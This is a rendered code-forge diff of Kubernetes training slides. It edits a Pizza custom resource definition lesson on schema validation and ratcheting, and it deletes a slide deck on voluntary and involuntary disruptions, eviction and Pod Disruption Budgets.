||||
|
||||
- Kubernetes 1.7: `apiextensions.k8s.io/v1beta1` introduced
|
||||
|
||||
- Kubernetes 1.16: `apiextensions.k8s.io/v1` introduced
|
||||
|
||||
- Kubernetes 1.22: `apiextensions.k8s.io/v1beta1` [removed][changes-in-122]
|
||||
|
||||
- Kubernetes 1.25: [CEL validation rules available in beta][crd-validation-rules-beta]
|
||||
|
||||
- Kubernetes 1.28: [validation ratcheting][validation-ratcheting] in [alpha][feature-gates]
|
||||
|
||||
- Kubernetes 1.29: [CEL validation rules available in GA][cel-validation-rules]
|
||||
|
||||
- Kubernetes 1.30: [validation ratcheting][validation-ratcheting] in [beta][feature-gates]; enabled by default
|
||||
|
||||
[crd-validation-rules-beta]: https://kubernetes.io/blog/2022/09/23/crd-validation-rules-beta/
|
||||
[cel-validation-rules]: https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#validation-rules
|
||||
[validation-ratcheting]: https://github.com/kubernetes/enhancements/tree/master/keps/sig-api-machinery/4008-crd-ratcheting
|
||||
[feature-gates]: https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/#feature-gates-for-alpha-or-beta-features
|
||||
[changes-in-122]: https://kubernetes.io/blog/2021/07/14/upcoming-changes-in-kubernetes-1-22/
|
||||
|
||||
---
|
||||
|
||||
## First slice of pizza
|
||||
|
||||
```yaml
|
||||
@@ -68,6 +42,8 @@ Things related to Custom Resource Definitions:
|
||||
|
||||
(a few optional things become mandatory, see [this guide](https://kubernetes.io/docs/reference/using-api/deprecation-guide/#customresourcedefinition-v122) for details)
|
||||
|
||||
- `apiextensions.k8s.io/v1` is available since Kubernetes 1.16
|
||||
|
||||
---
|
||||
|
||||
## Second slice of pizza
|
||||
@@ -120,9 +96,9 @@ The YAML below defines a resource using the CRD that we just created:
|
||||
kind: Pizza
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: hawaiian
|
||||
name: napolitana
|
||||
spec:
|
||||
toppings: [ cheese, ham, pineapple ]
|
||||
toppings: [ mozzarella ]
|
||||
```
|
||||
|
||||
.lab[
|
||||
@@ -138,7 +114,11 @@ spec:
|
||||
|
||||
## Type validation
|
||||
|
||||
- Recent versions of Kubernetes will issue errors about unknown fields
|
||||
- Older versions of Kubernetes will accept our pizza definition as is
|
||||
|
||||
- Newer versions, however, will issue warnings about unknown fields
|
||||
|
||||
(and if we use `--validate=false`, these fields will simply be dropped)
|
||||
|
||||
- We need to improve our OpenAPI schema
|
||||
|
||||
@@ -146,28 +126,6 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Creating a bland pizza
|
||||
|
||||
- Let's try to create a pizza anyway!
|
||||
|
||||
.lab[
|
||||
|
||||
- Only provide the most basic YAML manifest:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
kind: Pizza
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: hawaiian
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- That should work! (As long as we don't try to add pineapple😁)
|
||||
|
||||
---
|
||||
|
||||
## Third slice of pizza
|
||||
|
||||
- Let's add a full OpenAPI v3 schema to our Pizza CRD
|
||||
@@ -250,42 +208,24 @@ Note: we can update a CRD without having to re-create the corresponding resource
|
||||
|
||||
---
|
||||
|
||||
## Validation woes
|
||||
## Better data validation
|
||||
|
||||
- Let's check what happens if we try to update our pizzas
|
||||
- Let's change the data schema so that the sauce can only be `red` or `white`
|
||||
|
||||
- This will be implemented by @@LINK[k8s/pizza-5.yaml]
|
||||
|
||||
.lab[
|
||||
|
||||
- Try to add a label:
|
||||
- Update the Pizza CRD:
|
||||
```bash
|
||||
kubectl label pizza --all deliciousness=9001
|
||||
kubectl apply -f ~/container.training/k8s/pizza-5.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- It works for the pizzas that have `sauce` and `toppings`, but not the other one!
|
||||
|
||||
- The other one doesn't pass validation, and *can't be modified*
|
||||
|
||||
---
|
||||
|
||||
## First, let's fix this!
|
||||
|
||||
- Option 1: delete the pizza
|
||||
|
||||
*(deletion isn't subject to validation)*
|
||||
|
||||
- Option 2: update the pizza to add `sauce` and `toppings`
|
||||
|
||||
*(writing a pizza that passes validation is fine)*
|
||||
|
||||
- Option 3: relax the validation rules
|
||||
|
||||
---
|
||||
|
||||
## Next, explain what's happening
|
||||
## Validation *a posteriori*
|
||||
|
||||
- Some of the pizzas that we defined earlier *do not* pass validation
|
||||
|
||||
@@ -341,8 +281,6 @@ Note: we can update a CRD without having to re-create the corresponding resource
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Migrating database content
|
||||
|
||||
- We need to *serve* a version as long as we *store* objects in that version
|
||||
@@ -357,58 +295,6 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## Validation ratcheting
|
||||
|
||||
- Good news: it's not always necessary to introduce new versions
|
||||
|
||||
(and to write the associated conversion webhooks)
|
||||
|
||||
- *Validation ratcheting allows updates to custom resources that fail validation to succeed if the validation errors were on unchanged keypaths*
|
||||
|
||||
- In other words: allow changes that don't introduce further validation errors
|
||||
|
||||
- This was introduced in Kubernetes 1.28 (alpha), enabled by default in 1.30 (beta)
|
||||
|
||||
- The rules are actually a bit more complex
|
||||
|
||||
- Another (maybe more accurate) explanation: allow to tighten or loosen some field definitions
|
||||
|
||||
---
|
||||
|
||||
## Validation ratcheting example
|
||||
|
||||
- Let's change the data schema so that the sauce can only be `red` or `white`
|
||||
|
||||
- This will be implemented by @@LINK[k8s/pizza-5.yaml]
|
||||
|
||||
.lab[
|
||||
|
||||
- Update the Pizza CRD:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/pizza-5.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing validation ratcheting
|
||||
|
||||
- This should work with Kubernetes 1.30 and above
|
||||
|
||||
(but give an error for the `brownie` pizza with previous versions of K8S)
|
||||
|
||||
.lab[
|
||||
|
||||
- Add another label:
|
||||
```bash
|
||||
kubectl label pizzas --all food=definitely
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Even better data validation
|
||||
|
||||
- If we need more complex data validation, we can use a validating webhook
|
||||
|
||||
@@ -1,513 +0,0 @@
|
||||
# Disruptions
|
||||
|
||||
In a perfect world...
|
||||
|
||||
- hardware never fails
|
||||
|
||||
- software never has bugs
|
||||
|
||||
- ...and never needs to be updated
|
||||
|
||||
- ...and uses a predictable amount of resources
|
||||
|
||||
- ...and these resources are infinite anyways
|
||||
|
||||
- network latency and packet loss are zero
|
||||
|
||||
- humans never make mistakes
|
||||
|
||||
--
|
||||
|
||||
😬
|
||||
|
||||
---
|
||||
|
||||
## Disruptions
|
||||
|
||||
In the real world...
|
||||
|
||||
- hardware will fail randomly (without advance notice)
|
||||
|
||||
- software has bugs
|
||||
|
||||
- ...and we constantly add new features
|
||||
|
||||
- ...and will sometimes use more resources than expected
|
||||
|
||||
- ...and these resources are limited
|
||||
|
||||
- network latency and packet loss are NOT zero
|
||||
|
||||
- humans make mistakes (shutting down the wrong machine, the wrong app...)
|
||||
|
||||
---
|
||||
|
||||
## Disruptions
|
||||
|
||||
- In Kubernetes, a "disruption" is something that stops the execution of a Pod
|
||||
|
||||
- There are **voluntary** and **involuntary** disruptions
|
||||
|
||||
- voluntary = directly initiated by humans (including by mistake!)
|
||||
|
||||
- involuntary = everything else
|
||||
|
||||
- In this section, we're going to see what they are and how to prevent them
|
||||
|
||||
(or at least, mitigate their effects)
|
||||
|
||||
---
|
||||
|
||||
## Node outage
|
||||
|
||||
- Example: hardware failure (server or network), low-level error
|
||||
|
||||
(includes kernel bugs, issues affecting underlying hypervisors or infrastructure...)
|
||||
|
||||
- **Involuntary** disruption (even if it results from human error!)
|
||||
|
||||
- Consequence: all workloads on that node become unresponsive
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- scale workloads to at least 2 replicas (or more if quorum is needed)
|
||||
|
||||
- add anti-affinity scheduling constraints (to avoid having all pods on the same node)
|
||||
|
||||
---
|
||||
|
||||
## Node outage play-by-play
|
||||
|
||||
- Node goes down (or disconnected from network)
|
||||
|
||||
- Its lease (in Namespace `kube-node-lease`) doesn't get renewed
|
||||
|
||||
- Controller manager detects that and marks the node as "unreachable"
|
||||
|
||||
(this adds both a `NoSchedule` and `NoExecute` taints to the node)
|
||||
|
||||
- Eventually, the `NoExecute` taint will evict these pods
|
||||
|
||||
- This will trigger creation of replacement pods by owner controllers
|
||||
|
||||
(except for pods with a stable network identity, e.g. in a Stateful Set!)
|
||||
|
||||
---
|
||||
|
||||
## Node outage notes
|
||||
|
||||
- By default, pods will tolerate the `unreachable:NoExecute` taint for 5 minutes
|
||||
|
||||
(toleration automatically added by Admission controller `DefaultTolerationSeconds`)
|
||||
|
||||
- Pods of a Stateful Set don't recover automatically:
|
||||
|
||||
- as long as the Pod exists, a replacement Pod can't be created
|
||||
|
||||
- the Pod will exist as long as its Node exists
|
||||
|
||||
- deleting the Node (manually or automatically) will recover the Pod
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure
|
||||
|
||||
- Example: available memory on a node goes below a specific threshold
|
||||
|
||||
(because a pod is using too much memory and no limit was set)
|
||||
|
||||
- **Involuntary** disruption
|
||||
|
||||
- Consequence: kubelet starts to *evict* some pods
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- set *resource limits* on containers to prevent them from using too much resources
|
||||
|
||||
- set *resource requests* on containers to make sure they don't get evicted
|
||||
<br/>
|
||||
(as long as they use less than what they requested)
|
||||
|
||||
- make sure that apps don't use more resources than what they've requested
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure play-by-play
|
||||
|
||||
- Memory leak in an application container, slowly causing very high memory usage
|
||||
|
||||
- Overall free memory on the node goes below the *soft* or the *hard* threshold
|
||||
|
||||
(default hard threshold = 100Mi; default soft threshold = none)
|
||||
|
||||
- When reaching the *soft* threshold:
|
||||
|
||||
- kubelet waits until the "eviction soft grace period" expires
|
||||
|
||||
- then (if resource usage is still above the threshold) it gracefully evicts pods
|
||||
|
||||
- When reaching the *hard* threshold:
|
||||
|
||||
- kubelet immediately and forcefully evicts pods
|
||||
|
||||
---
|
||||
|
||||
## Which pods are evicted?
|
||||
|
||||
- Kubelet only considers pods that are using *more* than what they requested
|
||||
|
||||
(and only for the resource that is under pressure, e.g. RAM or disk usage)
|
||||
|
||||
- First, it sorts pods by *priority¹* (as set with the `priorityClassName` in the pod spec)
|
||||
|
||||
- Then, by how much their resource usage exceeds their request
|
||||
|
||||
(again, for the resource that is under pressure)
|
||||
|
||||
- It evicts pods until enough resources have been freed up
|
||||
|
||||
---
|
||||
|
||||
## Soft (graceful) vs hard (forceful) eviction
|
||||
|
||||
- Soft eviction = graceful shutdown of the pod
|
||||
|
||||
(honors the pod `terminationGracePeriodSeconds` timeout)
|
||||
|
||||
- Hard eviction = immediate shutdown of the pod
|
||||
|
||||
(kills all containers immediately)
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure notes
|
||||
|
||||
- If resource usage increases *very fast*, kubelet might not catch it fast enough
|
||||
|
||||
- For memory: this will trigger the kernel out-of-memory killer
|
||||
|
||||
- containers killed by OOM are automatically restarted (no eviction)
|
||||
|
||||
- eviction might happen at a later point though (if memory usage stays high)
|
||||
|
||||
- For disk: there is no "out-of-disk" killer, but writes will fail
|
||||
|
||||
- the `write` system call fails with `errno = ENOSPC` / `No space left on device`
|
||||
|
||||
- eviction typically happens shortly after (when kubelet catches up)
|
||||
|
||||
- When relying on disk/memory bursts a lot, using `priorityClasses` might help
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure delays
|
||||
|
||||
- By default, no soft threshold is defined
|
||||
|
||||
- Defining it requires setting both the threshold and the grace period
|
||||
|
||||
- Grace periods can be different for the different types of resources
|
||||
|
||||
- When a node is under pressure, kubelet places a `NoSchedule` taint
|
||||
|
||||
(to avoid adding more pods while the node is under pressure)
|
||||
|
||||
- Once the node is no longer under pressure, kubelet clears the taint
|
||||
|
||||
(after waiting an extra timeout, `evictionPressureTransitionPeriod`, 5 min by default)
|
||||
|
||||
---
|
||||
|
||||
## Accidental deletion
|
||||
|
||||
- Example: developer deletes the wrong Deployment, the wrong Namespace...
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
(from Kubernetes' perspective!)
|
||||
|
||||
- Consequence: application is down
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- only deploy to production systems through e.g. gitops workflows
|
||||
|
||||
- enforce peer review of changes
|
||||
|
||||
- only give users limited (e.g. read-only) access to production systems
|
||||
|
||||
- use canary deployments (might not catch all mistakes though!)
|
||||
|
||||
---
|
||||
|
||||
## Bad code deployment
|
||||
|
||||
- Example: critical bug introduced, application crashes immediately or is non-functional
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
(again, from Kubernetes' perspective!)
|
||||
|
||||
- Consequence: application is down
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- readiness probes can mitigate immediate crashes
|
||||
<br/>
|
||||
(rolling update continues only when enough pods are ready)
|
||||
|
||||
- delayed crashes will require a rollback
|
||||
<br/>
|
||||
(manual intervention, or automated by a canary system)
|
||||
|
||||
---
|
||||
|
||||
## Node shutdown
|
||||
|
||||
- Example: scaling down a cluster to save money
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are terminated
|
||||
|
||||
- this might disrupt workloads that have too many replicas on that node
|
||||
|
||||
- or workloads that should not be interrupted at all
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- terminate workloads one at a time, coordinating with users
|
||||
|
||||
--
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## Node shutdown
|
||||
|
||||
- Example: scaling down a cluster to save money
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are terminated
|
||||
|
||||
- this might disrupt workloads that have too many replicas on that node
|
||||
|
||||
- or workloads that should not be interrupted at all
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- ~~terminate workloads one at a time, coordinating with users~~
|
||||
|
||||
- use Pod Disruption Budgets
|
||||
|
||||
---
|
||||
|
||||
## Pod Disruption Budgets
|
||||
|
||||
- A PDB is a kind of *contract* between:
|
||||
|
||||
- "admins" = folks maintaining the cluster (e.g. adding/removing/updating nodes)
|
||||
|
||||
- "users" = folks deploying apps and workloads on the cluster
|
||||
|
||||
- A PDB expresses something like:
|
||||
|
||||
*in that particular set of pods, do not "disrupt" more than X at a time*
|
||||
|
||||
- Examples:
|
||||
|
||||
- in that set of frontend pods, do not disrupt more than 1 at a time
|
||||
|
||||
- in that set of worker pods, always have at least 10 ready
|
||||
<br/>
|
||||
(do not disrupt them if it would bring down the number of ready pods below 10)
|
||||
|
||||
---
|
||||
|
||||
## PDB - user side
|
||||
|
||||
- Cluster users create a PDB with a manifest like this one:
|
||||
|
||||
```yaml
|
||||
@@INCLUDE[k8s/pod-disruption-budget.yaml]
|
||||
```
|
||||
|
||||
- The PDB must indicate either `minAvailable` or `maxUnavailable`
|
||||
|
||||
---
|
||||
|
||||
## Rounding logic
|
||||
|
||||
- Percentages are rounded **up**
|
||||
|
||||
- When specifying `maxUnavailable` as a percentage, this can result in a higher percentage
|
||||
|
||||
(e.g. `maxUnavailable: 50%` with 3 pods can result in 2 pods being unavailable!)
|
||||
|
||||
---
|
||||
|
||||
## Unmanaged pods
|
||||
|
||||
- Specifying `minAvailable: X` works all the time
|
||||
|
||||
- Specifying `minAvailable: X%` or `maxUnavailable` requires *managed pods*
|
||||
|
||||
(pods that belong to a controller, e.g. Replica Set, Stateful Set...)
|
||||
|
||||
- This is because the PDB controller needs to know the total number of pods
|
||||
|
||||
(given by the `replicas` field, not merely by counting pod objects)
|
||||
|
||||
- The PDB controller will try to resolve the controller using the pod selector
|
||||
|
||||
- If that fails, the PDB controller will emit warning events
|
||||
|
||||
(visible with `kubectl describe pdb ...`)
|
||||
|
||||
---
|
||||
|
||||
## Zero
|
||||
|
||||
- `maxUnavailable: 0` means "do not disrupt my pods"
|
||||
|
||||
- Same thing if `minAvailable` is greater than or equal to the number of pods
|
||||
|
||||
- In that case, cluster admins are supposed to get in touch with cluster users
|
||||
|
||||
- This will prevent fully automated operation
|
||||
|
||||
  (and some cluster admins' automated systems might not honor that request)
|
||||
|
||||
---
|
||||
|
||||
## PDB - admin side
|
||||
|
||||
- As a cluster admin, we need to follow certain rules
|
||||
|
||||
- Only shut down (or restart) a node when no pods are running on that node
|
||||
|
||||
(except system pods belonging to Daemon Sets)
|
||||
|
||||
- To remove pods running on a node, we should use the *eviction API*
|
||||
|
||||
(which will check PDB constraints and honor them)
|
||||
|
||||
- To prevent new pods from being scheduled on a node, we can use a *taint*
|
||||
|
||||
- These operations are streamlined by `kubectl drain`, which will:
|
||||
|
||||
- *cordon* the node (add a `NoSchedule` taint)
|
||||
|
||||
- invoke the *eviction API* to remove pods while respecting their PDBs
|
||||
|
||||
---
|
||||
|
||||
## Theory vs practice
|
||||
|
||||
- `kubectl drain` won't evict pods using `emptyDir` volumes
|
||||
|
||||
(unless the `--delete-emptydir-data` flag is passed as well)
|
||||
|
||||
- Make sure that `emptyDir` volumes don't hold anything important
|
||||
|
||||
(they shouldn't, but... who knows!)
|
||||
|
||||
- Kubernetes lacks a standard way for users to express:
|
||||
|
||||
*this `emptyDir` volume can/cannot be safely deleted*
|
||||
|
||||
- If a PDB forbids an eviction, this requires manual coordination
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Unhealthy pod eviction policy
|
||||
|
||||
- By default, unhealthy pods can only be evicted if PDB allows it
|
||||
|
||||
(unhealthy = running, but not ready)
|
||||
|
||||
- In many cases, unhealthy pods aren't healthy anyway, and can be removed
|
||||
|
||||
- This behavior is enabled by setting the appropriate field in the PDB manifest:
|
||||
|
||||
```yaml
|
||||
spec:
|
||||
unhealthyPodEvictionPolicy: AlwaysAllow
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Node upgrade
|
||||
|
||||
- Example: upgrading kubelet or the Linux kernel on a node
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are temporarily interrupted, and restarted
|
||||
|
||||
- this might disrupt these workloads
|
||||
|
||||
- Mitigations:
|
||||
|
||||
  - migrate workloads off the node first (as if we were shutting it down)
|
||||
|
||||
---
|
||||
|
||||
## Node upgrade notes
|
||||
|
||||
- Is it necessary to drain a node before doing an upgrade?
|
||||
|
||||
- From [the documentation][node-upgrade-docs]:
|
||||
|
||||
*Draining nodes before upgrading kubelet ensures that pods are re-admitted and containers are re-created, which may be necessary to resolve some security issues or other important bugs.*
|
||||
|
||||
- It's *probably* safe to upgrade in-place for:
|
||||
|
||||
- kernel upgrades
|
||||
|
||||
- kubelet patch-level upgrades (1.X.Y → 1.X.Z)
|
||||
|
||||
- It's *probably* better to drain the node for minor-revision kubelet upgrades (1.X → 1.Y)
|
||||
|
||||
- In doubt, test extensively in staging environments!
|
||||
|
||||
[node-upgrade-docs]: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/#manual-deployments
|
||||
|
||||
---
|
||||
|
||||
## Manual rescheduling
|
||||
|
||||
- Example: moving workloads around to accommodate noisy neighbors or other issues
|
||||
|
||||
(e.g. pod X is doing a lot of disk I/O and this is starving other pods)
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- the moved workloads are temporarily interrupted
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- define an appropriate number of replicas, declare PDBs
|
||||
|
||||
- use the [eviction API][eviction-API] to move workloads
|
||||
|
||||
[eviction-API]: https://kubernetes.io/docs/concepts/scheduling-eviction/api-eviction/
|
||||
|
||||
???
|
||||
|
||||
:EN:- Voluntary and involuntary disruptions
|
||||
:EN:- Pod Disruption Budgets
|
||||
:FR:- "Disruptions" volontaires et involontaires
|
||||
:FR:- Pod Disruption Budgets
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user